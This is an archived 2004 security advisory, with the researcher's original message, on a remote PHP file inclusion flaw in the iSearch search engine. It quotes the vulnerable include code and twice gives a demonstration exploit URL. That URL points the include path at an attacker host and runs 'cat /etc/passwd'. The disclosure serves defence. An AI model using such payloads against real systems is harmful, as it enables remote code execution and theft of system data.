SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   iSearch Vendors:   Willis, Ian
iSearch Include File Holes Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1008900
SecurityTracker URL:  http://securitytracker.com/id/1008900
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 2 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   taktau at taktau.cc reported an include file vulnerability in iSearch. A remote user can execute arbitrary PHP code and operating system commands on the target system.

It is reported that 'isearch.inc.php' includes the following files relative to the user-supplied $isearch_path variable:

isearch_core.inc.php
isearch_spider.inc.php
isearch_search.inc.php

A remote user can reportedly supply a specially crafted URL that will include arbitrary PHP code from a remote location and execute the code on the target system. The code, including operating system commands, will execute with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/isearch/isearch.inc.php?isearch_path=http://[attacker]?&cmd=cat /etc/passwd

The author indicates that this vulnerability was reported by blackcobra-x.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.isearchthenet.com/isearch/index.php (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Vuln: iSearch


PHP Code Injection Vulnerabilities in iSearch

1. Summary
The iSearch PHP search engine allows you to build a
searchable database for your web site. Visitors can
search for key words and a list of any pages that match
is returned to them.

2. Vendor URL: http://www.isearchthenet.com/isearch/

3. PHP Injection
-- HTTP Request --

http://www.example.com/isearch/isearch.inc.php?isearch_path=http://attacker?&cmd=cat 
/etc/passwd

-- HTTP Request --

4. Code impacted: isearch.inc.php
<?php
/*blabla
..*/
include ("$isearch_path/isearch_core.inc.php");
include ("$isearch_path/isearch_spider.inc.php");
include ("$isearch_path/isearch_search.inc.php");

?>

reported by blackcobra-x
greetz to all bC-X crews, toyok aka phrack, r3dstorm

- taktau@taktau.cc -



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC